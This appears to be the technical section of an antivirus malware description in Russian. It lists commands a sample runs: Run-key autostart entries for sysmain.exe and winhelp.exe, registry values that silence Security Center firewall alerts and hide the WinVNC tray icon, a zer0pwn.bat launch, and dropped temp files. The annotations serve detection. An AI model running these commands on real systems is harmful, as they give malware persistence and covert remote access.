Техническая информация
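- Центр обеспечения безопасности (Security Center): приведённые ниже команды reg.exe записывают в его раздел реестра значения firewalldisablenotify и firewalloverride, равные 1, что отключает оповещения Security Center о состоянии брандмауэра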
- <Текущая директория>\B2E.tmp
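- <SYSTEM32>\reg.exe add hklm\software\microsoft\windows\currentversion\policies\explorer\run /v system32 /t REG_SZ /d <SYSTEM32>\sysmain.exe /f
- <SYSTEM32>\reg.exe add hkcu\software\microsoft\windows\currentversion\policies\explorer\run /v winhelp32 /t REG_SZ /d <SYSTEM32>\winhelp.exe /f
  (Обе команды прописывают автозапуск через ключ Policies\Explorer\Run — в HKLM и в HKCU. При проверке системы следует искать в этих ключах параметры system32 и winhelp32, а также файлы sysmain.exe и winhelp.exe в <SYSTEM32>.)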
- <SYSTEM32>\ntvdm.exe -f -i1 -w -a <SYSTEM32>\krnl386.exe
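- <SYSTEM32>\reg.exe add hklm\software\orl\winvnc3 /v disabletrayicon /t REG_DWORD /d 00000001 /f
  (Раздел software\orl\winvnc3 содержит настройки VNC-сервера WinVNC; параметр disabletrayicon, равный 1, судя по его имени, скрывает значок сервера в области уведомлений, то есть удалённый доступ остаётся незаметным для пользователя.)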
- <SYSTEM32>\cmd.exe /c ""%TEMP%\zer0pwn.bat" "
- <SYSTEM32>\reg.exe add "hklm\software\microsoft\security center" /v firewalldisablenotify /t REG_DWORD /d 00000001 /f
- <SYSTEM32>\reg.exe add "hklm\software\microsoft\security center" /v firewalloverride /t REG_DWORD /d 00000001 /f
- [<HKLM>\software\orl\winvnc3]
- %TEMP%\zer0pwn.bat
- %TEMP%\files.tmp
- %TEMP%\delete.bat
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- %TEMP%\B2E2.tmp
- %TEMP%\B2E.tmp
- <Текущая директория>\B2E.tmp
- %TEMP%\tempfile.dat
- %TEMP%\tempfile.exe
- %TEMP%\delete.bat
- %TEMP%\files.tmp
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- %TEMP%\B2E2.tmp
- %TEMP%\B2E.tmp
- %TEMP%\tempfile.dat
- %TEMP%\tempfile.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'WOWFaxClass' WindowName: ''